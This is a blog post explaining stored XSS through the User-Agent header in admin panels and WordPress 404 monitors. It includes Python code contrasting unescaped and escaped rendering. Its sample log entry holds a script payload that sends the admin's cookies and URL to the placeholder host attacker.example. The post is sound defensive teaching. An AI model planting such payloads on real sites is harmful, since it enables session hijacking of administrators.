A few days ago I did some tests with a Firefox add-on called User Agent Switcher. What I was trying to test was how social networks (Twitter, Facebook, Foursquare) react to a sudden change in user agent. But then I came to a better idea. User agents, along with other data from your browser and PC, are increasingly used to track users on the web for marketing and security reasons. These data are at the core of systems called cookieless device fingerprinting, and the number of websites that use this kind of data is growing as we speak. If you don't control how you store and display this data in your admin panel, there is an easy way for you to get XSSed. In this post I'll show you how.
Here is the experimental video:
What have I done?
In a possible attack scenario the attacker puts malicious JavaScript in his User-Agent string. If your admin panel displays that string without escaping it, the script runs in the administrator's browser, and from there the attacker can steal your session and your admin URL.
Another point of failure is 404 monitors for your WordPress site (they all record the user agent of the request): an attacker can intentionally request a broken link while sending a malicious user agent, and the payload lands in the monitor's report.
For security reasons you should check how you collect this data, how you store it, and how you display it: the user agent is attacker-controlled input like any other request header and must be escaped on output.
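To make the failure concrete, here is an added illustration (my own code, not code from any of the add-ons, monitors or plugins mentioned in this post): a minimal Python model of a 404 monitor that stores the User-Agent header and renders it into an admin page, first with raw interpolation and then with HTML escaping on output. The log entries and the attacker host `attacker.example` are constructed for the example.

```python
import html

# Constructed sample requests, as a 404 monitor or analytics plugin would
# log them. The second entry carries the attacker's User-Agent: a script
# that leaks the viewer's cookies and current URL to a host the attacker
# controls (attacker.example is a placeholder, not a real address).
SAMPLE_REQUESTS = [
    {"path": "/wp-login.php", "status": 200,
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) "
                   "Gecko/20100101 Firefox/10.0"},
    {"path": "/no-such-page", "status": 404,
     "user_agent": '<script>new Image().src="http://attacker.example/?c="'
                   '+document.cookie+"&u="+location.href</script>'},
]


def broken_link_entries(entries):
    """What a 404 monitor keeps: only the requests that hit a missing page."""
    return [e for e in entries if e["status"] == 404]


def render_row_vulnerable(entry):
    """Raw interpolation: whatever the client sent becomes markup in the
    admin page, so the <script> above executes with the admin's session."""
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
        entry["path"], entry["status"], entry["user_agent"])


def render_row_safe(entry):
    """Escape on output: html.escape turns < > & and both quote characters
    into entities, so the payload is shown as text, not parsed as HTML."""
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
        html.escape(entry["path"]), entry["status"],
        html.escape(entry["user_agent"]))


def render_admin_table(entries, row_renderer):
    """Build the admin-panel table with whichever row renderer is given."""
    rows = "".join(row_renderer(e) for e in entries)
    return ("<table><tr><th>Path</th><th>Status</th><th>User-Agent</th></tr>"
            "{}</table>".format(rows))


def looks_like_markup(user_agent):
    """Cheap collection-time check, in the spirit of the Cloud Flare blocking
    mentioned at the end of the post: a real browser UA never contains angle
    brackets. Defence in depth only; it never replaces escaping on output."""
    return "<" in user_agent or ">" in user_agent


if __name__ == "__main__":
    hits = broken_link_entries(SAMPLE_REQUESTS)
    print("Vulnerable rendering:")
    print(render_admin_table(hits, render_row_vulnerable))
    print("Safe rendering:")
    print(render_admin_table(hits, render_row_safe))
    for e in SAMPLE_REQUESTS:
        verdict = "suspicious UA" if looks_like_markup(e["user_agent"]) else "ok"
        print(e["path"], verdict)
```

Run it and compare the two tables: in the vulnerable one the `<script>` tag is live markup that a browser opening the page would execute; in the safe one it appears as `&lt;script&gt;` and is merely displayed. The same rule applies to every other fingerprinting field you store (Accept-Language, screen size, plugin lists): escape at the point where it is written into HTML.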
How hard is this?
Well, I'm not even a programmer. For my job requirements I've learned some basics of pentesting. That's all. I would say that this is an easy one.
I'm also aware that this attack concept is not new, but the increased usage of this data nowadays can compromise security if it's not handled properly.
+1 for Cloud Flare, which blocks users with faulty user agents!